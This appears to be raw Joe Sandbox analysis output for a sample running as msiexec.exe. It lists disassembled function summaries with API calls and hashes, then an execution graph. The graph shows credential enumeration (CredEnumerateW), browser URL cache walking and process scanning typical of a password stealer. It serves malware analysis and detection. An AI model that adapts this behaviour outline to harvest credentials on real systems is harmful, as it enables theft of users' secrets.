                                                                    • _free.LIBCMT ref: 234B536F
                                                                      • Part of subcall function 234B571E: HeapFree.KERNEL32(00000000,00000000,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?), ref: 234B5734
                                                                      • Part of subcall function 234B571E: GetLastError.KERNEL32(?,?,234B924F,?,00000000,?,00000000,?,234B9276,?,00000007,?,?,234B7E5A,?,?), ref: 234B5746
                                                                    • _free.LIBCMT ref: 234B5381
                                                                    • _free.LIBCMT ref: 234B5394
                                                                    • _free.LIBCMT ref: 234B53A5
                                                                    • _free.LIBCMT ref: 234B53B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: a4022f7cdfe2dace30dbae452f1ced67511af68cc498f0e91f0b8c2cfe13ba1f
                                                                    • Instruction ID: a693ea4993d3710fc35bde5c3ae77b3f87b71bfa61375c2780824b4204f5738e
                                                                    • Opcode Fuzzy Hash: a4022f7cdfe2dace30dbae452f1ced67511af68cc498f0e91f0b8c2cfe13ba1f
                                                                    • Instruction Fuzzy Hash: 1EF05EB0E24220DFC6527F259A804487BF2B73AA287490DCEF810B3351DF3D85128BAD
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 234B4C1D
                                                                    • _free.LIBCMT ref: 234B4CE8
                                                                    • _free.LIBCMT ref: 234B4CF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Windows\System32\msiexec.exe
                                                                    • API String ID: 2506810119-1382325751
                                                                    • Opcode ID: eb73fca3784488cf4c805b6bee9f2d7d4f093f7e3673d5cf2afc9439ad240cef
                                                                    • Instruction ID: 6fbff610a6529cf13936dd2b8bd656d974a36aaa80e85ae93f74b786244cae9a
                                                                    • Opcode Fuzzy Hash: eb73fca3784488cf4c805b6bee9f2d7d4f093f7e3673d5cf2afc9439ad240cef
                                                                    • Instruction Fuzzy Hash: B7317771F00318AFDB21EF998880D9EBBFEEBA5B14F5544DAE50497300D6748A41CB78
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,234B6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 234B8731
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 234B87BA
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 234B87CC
                                                                    • __freea.LIBCMT ref: 234B87D5
                                                                      • Part of subcall function 234B56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 234B5702
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 8a282d0802ebcab225b7d734bf4817301ec33e734c1d5bee7de6548ec9017cde
                                                                    • Instruction ID: de1932c351549e969897e644077d6639e7b291e9f08f3ad8eedf421d16537174
                                                                    • Opcode Fuzzy Hash: 8a282d0802ebcab225b7d734bf4817301ec33e734c1d5bee7de6548ec9017cde
                                                                    • Instruction Fuzzy Hash: 1A31EE72E0026AAFDF249F64CC84DAF7BB6EB54614F1401E9EC04D6250EB35C851CBA8
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(234BC7DD), ref: 234BC7E6
                                                                    • GetModuleHandleA.KERNEL32(?,234BC7DD), ref: 234BC838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 234BC860
                                                                      • Part of subcall function 234BC803: GetProcAddress.KERNEL32(00000000,234BC7F4), ref: 234BC804
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID:
                                                                    • API String ID: 1646373207-0
                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction ID: 046cc0f64155d5373335f5d4008bb27cd6f1aefe976b746b871ccbe7da636f2c
                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction Fuzzy Hash: 7501C800D453412CEA2166740CC19AA5FBF9B37963B181ADAA150CA293D9908F0783FD
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,234B1D66,00000000,00000000,?,234B5C88,234B1D66,00000000,00000000,00000000,?,234B5E85,00000006,FlsSetValue), ref: 234B5D13
                                                                    • GetLastError.KERNEL32(?,234B5C88,234B1D66,00000000,00000000,00000000,?,234B5E85,00000006,FlsSetValue,234BE190,FlsSetValue,00000000,00000364,?,234B5BC8), ref: 234B5D1F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,234B5C88,234B1D66,00000000,00000000,00000000,?,234B5E85,00000006,FlsSetValue,234BE190,FlsSetValue,00000000), ref: 234B5D2D
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 6580412767f41a4283313543ee6c77a282f72c068b4f6478597114245e607dd1
                                                                    • Instruction ID: 0555cbec403a2299debfdf6418f26097762395b74a9f037d65fb3a63fe45ad69
                                                                    • Opcode Fuzzy Hash: 6580412767f41a4283313543ee6c77a282f72c068b4f6478597114245e607dd1
                                                                    • Instruction Fuzzy Hash: DE01FC36E052226BC3156E789C4CE46B7FEAF066E571447E1FA15E7240DB24D402CAF4
                                                                    APIs
                                                                    • _free.LIBCMT ref: 234B655C
                                                                      • Part of subcall function 234B62BC: IsProcessorFeaturePresent.KERNEL32(00000017,234B62AB,00000000,?,?,?,?,00000016,?,?,234B62B8,00000000,00000000,00000000,00000000,00000000), ref: 234B62BE
                                                                      • Part of subcall function 234B62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 234B62E0
                                                                      • Part of subcall function 234B62BC: TerminateProcess.KERNEL32(00000000), ref: 234B62E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                    • String ID: *?$.
                                                                    • API String ID: 2667617558-3972193922
                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction ID: 969fc28233c570336a01ca39662ed6577e085a818722ce7167029018137ab152
                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction Fuzzy Hash: 9951A675E00209EFDB14DFA8C880AADBBFAFF58714F1441EDD454E7345D6399A018B68
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: : $Se.
                                                                    • API String ID: 4218353326-4089948878
                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction ID: 73cfe0f5455ccd0f911ab602702187a6bb64ba8778881fcc3c61569827fbb729
                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction Fuzzy Hash: 6511C471E00348AFCB10DFA89840BDDFBFDAF19604F5440DAE545E7212E6705B028779
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 234B2903
                                                                      • Part of subcall function 234B35D2: RaiseException.KERNEL32(?,?,?,234B2925,00000000,00000000,00000000,?,?,?,?,?,234B2925,?,234C21B8), ref: 234B3632
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 234B2920
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: 2971a5d0141f077d01f24d10344fad749f6b100a1f82be6ba92093e0e05501ba
                                                                    • Instruction ID: 67373e96d73d4146c364f0004a96cc3adb006fa0e3c674fde11e874968e7dbc4
                                                                    • Opcode Fuzzy Hash: 2971a5d0141f077d01f24d10344fad749f6b100a1f82be6ba92093e0e05501ba
                                                                    • Instruction Fuzzy Hash: 60F0F434E1030C7B8F04B6A5EC44D9A737E9B20A50B9046F5AE64D2190EF71EA16C5FC
                                                                    APIs
                                                                    • GetOEMCP.KERNEL32(00000000,?,?,234B6C7C,?), ref: 234B6A1E
                                                                    • GetACP.KERNEL32(00000000,?,?,234B6C7C,?), ref: 234B6A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.3306066608.00000000234B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 234B0000, based on PE: true
                                                                    • Associated: 00000008.00000002.3306004032.00000000234B0000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000008.00000002.3306066608.00000000234C6000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_234b0000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: |lK#
                                                                    • API String ID: 0-4035581376
                                                                    • Opcode ID: 88911f21b1515668068c99522376fcaaa25715455101022fd7c6e472ca8d19ea
                                                                    • Instruction ID: 9d461fd1fc6f9d5d1a51d2838bbbe5744ac70a74ae7d0509ae6cb32990e3ef85
                                                                    • Opcode Fuzzy Hash: 88911f21b1515668068c99522376fcaaa25715455101022fd7c6e472ca8d19ea
                                                                    • Instruction Fuzzy Hash: 3EF08C30E00108CBDB00EB68C4487AC77B6FB16339F144BC8E4389A2C1EB7D89468B68

                                                                    Execution Graph

                                                                    Execution Coverage:5.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:1.3%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:73
API calls 38456->38490 38782 40add4 38456->38782 38787 445389 38456->38787 38796 40ae51 38456->38796 38457 4456eb 38463 4456fd memset memset memset memset 38457->38463 38464 4457ea 38457->38464 38465 445389 255 API calls 38458->38465 38888 40aebe 38459->38888 38915 445093 23 API calls 38460->38915 38810 409c70 wcscpy wcsrchr 38463->38810 38813 413d29 38464->38813 38471 445c47 38465->38471 38473 445e33 38467->38473 38469 445e7e 38475 445f67 38469->38475 38478 40b2cc 27 API calls 38471->38478 38472->38358 38472->38359 38474 409d1f 6 API calls 38473->38474 38479 445e47 38474->38479 38480 40b2cc 27 API calls 38475->38480 38481 40b2cc 27 API calls 38476->38481 38483 445c53 38478->38483 38914 409b98 GetFileAttributesW 38479->38914 38485 445f73 38480->38485 38481->38456 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38489 409d1f 6 API calls 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38488 445e56 38488->38460 38496 445e83 memset 38488->38496 38493 445f87 38489->38493 38490->38456 38494 44578d 38491->38494 38495 445389 255 API calls 38492->38495 38918 409b98 GetFileAttributesW 38493->38918 38494->38464 38501 40b2cc 27 API calls 38494->38501 38495->38358 38500 40b2cc 27 API calls 38496->38500 38499->38375 38499->38444 38502 445eab 38500->38502 38503 4457a8 38501->38503 38504 409d1f 6 API calls 38502->38504 38505 409d1f 6 API calls 38503->38505 38506 445ebf 38504->38506 38507 4457b8 38505->38507 38508 40ae18 9 API calls 38506->38508 38812 409b98 GetFileAttributesW 38507->38812 38518 445ef5 38508->38518 38510 4457c7 38510->38464 38511 4087b3 337 API calls 38510->38511 38511->38464 38512 40ae51 9 API calls 38512->38518 38513 445f5c 38514 40aebe FindClose 38513->38514 38514->38475 38515 40add4 2 API calls 38515->38518 38516 40b2cc 27 API calls 38516->38518 38517 409d1f 6 API calls 38517->38518 38518->38512 38518->38513 38518->38515 38518->38516 38518->38517 38520 445f3a 38518->38520 38916 409b98 
GetFileAttributesW 38518->38916 38917 445093 23 API calls 38520->38917 38522->38319 38523->38322 38524->38319 38525->38314 38527 40c775 38526->38527 38919 40b1ab free free 38527->38919 38529 40c788 38920 40b1ab free free 38529->38920 38531 40c790 38921 40b1ab free free 38531->38921 38533 40c798 38534 40aa04 free 38533->38534 38535 40c7a0 38534->38535 38922 40c274 memset 38535->38922 38540 40a8ab 9 API calls 38541 40c7c3 38540->38541 38542 40a8ab 9 API calls 38541->38542 38543 40c7d0 38542->38543 38951 40c3c3 38543->38951 38547 40c7e5 38548 40c877 38547->38548 38549 40c86c 38547->38549 38974 40a706 wcslen memcpy 38547->38974 38976 40c634 49 API calls 38547->38976 38556 40bdb0 38548->38556 38977 4053fe 39 API calls 38549->38977 38552 40c813 _wcslwr 38975 40c634 49 API calls 38552->38975 38554 40c829 wcslen 38554->38547 39159 404363 38556->39159 38559 40bf5d 39179 40440c 38559->39179 38561 40bdee 38561->38559 38564 40b2cc 27 API calls 38561->38564 38562 40bddf CredEnumerateW 38562->38561 38565 40be02 wcslen 38564->38565 38565->38559 38572 40be1e 38565->38572 38566 40be26 wcsncmp 38566->38572 38569 40be7d memset 38570 40bea7 memcpy 38569->38570 38569->38572 38571 40bf11 wcschr 38570->38571 38570->38572 38571->38572 38572->38559 38572->38566 38572->38569 38572->38570 38572->38571 38573 40b2cc 27 API calls 38572->38573 38575 40bf43 LocalFree 38572->38575 39182 40bd5d 28 API calls 38572->39182 39183 404423 38572->39183 38574 40bef6 _wcsnicmp 38573->38574 38574->38571 38574->38572 38575->38572 38576 4135f7 39196 4135e0 38576->39196 38579 40b2cc 27 API calls 38580 41360d 38579->38580 38581 40a804 8 API calls 38580->38581 38582 413613 38581->38582 38583 41361b 38582->38583 38584 41363e 38582->38584 38586 40b273 27 API calls 38583->38586 38585 4135e0 FreeLibrary 38584->38585 38587 413643 38585->38587 38588 413625 GetProcAddress 38586->38588 38587->38349 38588->38584 38589 413648 38588->38589 38590 413658 38589->38590 38591 4135e0 FreeLibrary 38589->38591 38590->38349 38592 
413666 38591->38592 38592->38349 39199 4449b9 38593->39199 38596 444c1f 38596->38329 38597 4449b9 42 API calls 38599 444b4b 38597->38599 38598 444c15 38600 4449b9 42 API calls 38598->38600 38599->38598 39220 444972 GetVersionExW 38599->39220 38600->38596 38602 444b99 memcmp 38607 444b8c 38602->38607 38603 444c0b 39224 444a85 42 API calls 38603->39224 38607->38602 38607->38603 39221 444aa5 42 API calls 38607->39221 39222 40a7a0 GetVersionExW 38607->39222 39223 444a85 42 API calls 38607->39223 38610 40399d 38609->38610 39225 403a16 38610->39225 38612 403a09 39239 40b1ab free free 38612->39239 38614 4039a3 38614->38612 38618 4039f4 38614->38618 39236 40a02c CreateFileW 38614->39236 38615 403a12 wcsrchr 38615->38336 38618->38612 38619 4099c6 2 API calls 38618->38619 38619->38612 38621 414c2e 14 API calls 38620->38621 38622 404048 38621->38622 38623 414c2e 14 API calls 38622->38623 38624 404056 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 404073 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 40408e 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 4040a6 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040ba 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040cb 38633->38634 39266 40414f memset 38634->39266 38636 4040e0 38637 404140 38636->38637 38639 4040ec memset 38636->38639 38641 4099c6 2 API calls 38636->38641 38642 40a8ab 9 API calls 38636->38642 39280 40b1ab free free 38637->39280 38639->38636 38640 404148 38640->38396 38641->38636 38642->38636 39293 40a6e6 WideCharToMultiByte 38643->39293 38645 4087ed 39294 4095d9 memset 38645->39294 38648 408809 memset memset memset memset memset 38649 40b2cc 27 API calls 38648->38649 38650 4088a1 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088b1 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088c0 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 4088d0 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 4088df 38657->38658 38659 409d1f 6 
API calls 38658->38659 38660 4088ef 38659->38660 38661 40b2cc 27 API calls 38660->38661 38662 4088fe 38661->38662 38663 409d1f 6 API calls 38662->38663 38664 40890e 38663->38664 38665 40b2cc 27 API calls 38664->38665 38666 40891d 38665->38666 38667 409d1f 6 API calls 38666->38667 38668 40892d 38667->38668 39313 409b98 GetFileAttributesW 38668->39313 38670 40893e 38671 408943 38670->38671 38672 408958 38670->38672 39314 407fdf 75 API calls 38671->39314 39315 409b98 GetFileAttributesW 38672->39315 38675 408964 38676 408969 38675->38676 38677 40897b 38675->38677 39316 4082c7 198 API calls 38676->39316 39317 409b98 GetFileAttributesW 38677->39317 38680 408987 38692 408953 38692->38396 38695 40b633 free 38694->38695 38696 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38695->38696 38697 413f00 Process32NextW 38696->38697 38698 413da5 OpenProcess 38697->38698 38699 413f17 CloseHandle 38697->38699 38700 413df3 memset 38698->38700 38703 413eb0 38698->38703 38699->38439 39583 413f27 38700->39583 38702 413ebf free 38702->38703 38703->38697 38703->38702 38704 4099f4 3 API calls 38703->38704 38704->38703 38705 413e37 GetModuleHandleW 38707 413e46 GetProcAddress 38705->38707 38708 413e1f 38705->38708 38707->38708 38708->38705 39588 413959 38708->39588 39604 413ca4 38708->39604 38710 413ea2 CloseHandle 38710->38703 38712 414c2e 14 API calls 38711->38712 38713 403eb7 38712->38713 38714 414c2e 14 API calls 38713->38714 38715 403ec5 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403ee2 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403efd 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403f15 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f29 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f3a 38724->38725 38726 40414f 33 API calls 38725->38726 38727 403f4f 38726->38727 38728 403faf 38727->38728 38730 403f5b memset 38727->38730 38732 4099c6 2 API calls 38727->38732 38733 40a8ab 9 API calls 38727->38733 39618 40b1ab 
free free 38728->39618 38730->38727 38731 403fb7 38731->38378 38732->38727 38733->38727 38735 414c2e 14 API calls 38734->38735 38736 403d26 38735->38736 38737 414c2e 14 API calls 38736->38737 38738 403d34 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d51 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d6c 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d84 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403d98 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403da9 38747->38748 38749 40414f 33 API calls 38748->38749 38755 403dbe 38749->38755 38750 403e1e 39619 40b1ab free free 38750->39619 38751 403dca memset 38751->38755 38753 403e26 38753->38393 38754 4099c6 2 API calls 38754->38755 38755->38750 38755->38751 38755->38754 38756 40a8ab 9 API calls 38755->38756 38756->38755 38758 414b81 9 API calls 38757->38758 38759 414c40 38758->38759 38760 414c73 memset 38759->38760 39620 409cea 38759->39620 38764 414c94 38760->38764 38763 414c64 38763->38372 38765 414cf4 wcscpy 38764->38765 39623 414bb0 wcscpy 38764->39623 38765->38763 38767 414cd2 39624 4145ac RegQueryValueExW 38767->39624 38769 414ce9 38769->38765 38771 409d43 wcscpy 38770->38771 38773 409d62 38770->38773 38772 409719 2 API calls 38771->38772 38774 409d51 wcscat 38772->38774 38773->38416 38774->38773 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38456 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38456 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38790 4453c4 38788->38790 38789 40ae51 9 API calls 38789->38790 38790->38789 38791 4453f3 38790->38791 38792 40add4 2 API calls 38790->38792 38795 445403 250 API calls 38790->38795 38793 40aebe FindClose 38791->38793 38792->38790 38794 4453fe 38793->38794 
38794->38456 38795->38790 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38456 38803->38802 38804->38368 38805->38348 38806->38442 38807->38425 38808->38425 38809->38457 38811 409c89 38810->38811 38811->38482 38812->38510 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38338 38820->38341 38821->38385 38822->38408 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39625 409b98 GetFileAttributesW 38833->39625 38835 40b792 38836 40b7c2 38835->38836 38838 409c70 2 API calls 38835->38838 39626 40bb98 38836->39626 38840 40b7a5 38838->38840 38843 40b2cc 27 API calls 38840->38843 38841 40b837 CloseHandle 38846 40b83e memset 38841->38846 38842 40b817 39660 409a45 GetTempPathW 38842->39660 38844 40b7b2 38843->38844 38847 409d1f 6 API calls 38844->38847 39659 40a6e6 WideCharToMultiByte 38846->39659 38847->38836 38848 40b827 38848->38846 38850 40b866 38851 444432 120 API calls 38850->38851 38852 40b879 38851->38852 38853 40b273 27 API calls 38852->38853 38854 40bad5 38852->38854 38855 40b89a 38853->38855 38856 40b04b ??3@YAXPAX 38854->38856 38857 438552 133 API calls 38855->38857 38858 40baf3 38856->38858 38859 40b8a4 38857->38859 38858->38419 38860 40bacd 38859->38860 38862 4251c4 136 API calls 38859->38862 38861 443d90 110 API calls 38860->38861 38861->38854 38885 40b8b8 38862->38885 38863 40bac6 39672 424f26 122 API calls 38863->39672 
38864 40b8bd memset 39663 425413 17 API calls 38864->39663 38867 425413 17 API calls 38867->38885 38870 40a71b MultiByteToWideChar 38870->38885 38871 40a734 MultiByteToWideChar 38871->38885 38874 40b9b5 memcmp 38874->38885 38875 4099c6 2 API calls 38875->38885 38876 404423 37 API calls 38876->38885 38879 4251c4 136 API calls 38879->38885 38880 40bb3e memset memcpy 39673 40a734 MultiByteToWideChar 38880->39673 38882 40bb88 LocalFree 38882->38885 38885->38863 38885->38864 38885->38867 38885->38870 38885->38871 38885->38874 38885->38875 38885->38876 38885->38879 38885->38880 38886 40ba5f memcmp 38885->38886 39664 4253ef 16 API calls 38885->39664 39665 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38885->39665 39666 4253af 17 API calls 38885->39666 39667 4253cf 17 API calls 38885->39667 39668 447280 memset 38885->39668 39669 447960 memset memcpy memcpy memcpy 38885->39669 39670 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38885->39670 39671 447920 memcpy memcpy memcpy 38885->39671 38886->38885 38887->38421 38889 40aed1 38888->38889 38890 40aec7 FindClose 38888->38890 38889->38472 38890->38889 38892 4099d7 38891->38892 38893 4099da memcpy 38891->38893 38892->38893 38893->38395 38895 40b2cc 27 API calls 38894->38895 38896 44543f 38895->38896 38897 409d1f 6 API calls 38896->38897 38898 44544f 38897->38898 39765 409b98 GetFileAttributesW 38898->39765 38900 44545e 38901 445476 38900->38901 38903 40b6ef 249 API calls 38900->38903 38902 40b2cc 27 API calls 38901->38902 38904 445482 38902->38904 38903->38901 38905 409d1f 6 API calls 38904->38905 38906 445492 38905->38906 39766 409b98 GetFileAttributesW 38906->39766 38908 4454a1 38909 4454b9 38908->38909 38910 40b6ef 249 API calls 38908->38910 38909->38423 38910->38909 38911->38422 38912->38447 38913->38453 38914->38488 38915->38469 38916->38518 38917->38518 38918->38499 38919->38529 38920->38531 38921->38533 38923 414c2e 14 API calls 38922->38923 38924 40c2ae 38923->38924 38978 40c1d3 38924->38978 38929 40c3be 38946 40a8ab 
38929->38946 38930 40afcf 2 API calls 38931 40c2fd FindFirstUrlCacheEntryW 38930->38931 38932 40c3b6 38931->38932 38933 40c31e wcschr 38931->38933 38934 40b04b ??3@YAXPAX 38932->38934 38935 40c331 38933->38935 38936 40c35e FindNextUrlCacheEntryW 38933->38936 38934->38929 38938 40a8ab 9 API calls 38935->38938 38936->38933 38937 40c373 GetLastError 38936->38937 38939 40c3ad FindCloseUrlCache 38937->38939 38940 40c37e 38937->38940 38941 40c33e wcschr 38938->38941 38939->38932 38942 40afcf 2 API calls 38940->38942 38941->38936 38943 40c34f 38941->38943 38944 40c391 FindNextUrlCacheEntryW 38942->38944 38945 40a8ab 9 API calls 38943->38945 38944->38933 38944->38939 38945->38936 39094 40a97a 38946->39094 38949 40a8cc 38949->38540 38950 40a8d0 7 API calls 38950->38949 39099 40b1ab free free 38951->39099 38953 40c3dd 38954 40b2cc 27 API calls 38953->38954 38955 40c3e7 38954->38955 38956 40c50e 38955->38956 38957 40c3ff 38955->38957 38971 405337 38956->38971 38958 40a9ce 4 API calls 38957->38958 38959 40c418 memset 38958->38959 39100 40aa1d 38959->39100 38962 40c471 38964 40c47a _wcsupr 38962->38964 38963 40c505 38963->38956 38965 40a8d0 7 API calls 38964->38965 38966 40c498 38965->38966 38967 40a8d0 7 API calls 38966->38967 38968 40c4ac memset 38967->38968 38969 40aa1d 38968->38969 38970 40c4e4 RegEnumValueW 38969->38970 38970->38963 38970->38964 39102 405220 38971->39102 38974->38552 38975->38554 38976->38547 38977->38548 38979 40ae18 9 API calls 38978->38979 38985 40c210 38979->38985 38980 40ae51 9 API calls 38980->38985 38981 40c264 38982 40aebe FindClose 38981->38982 38984 40c26f 38982->38984 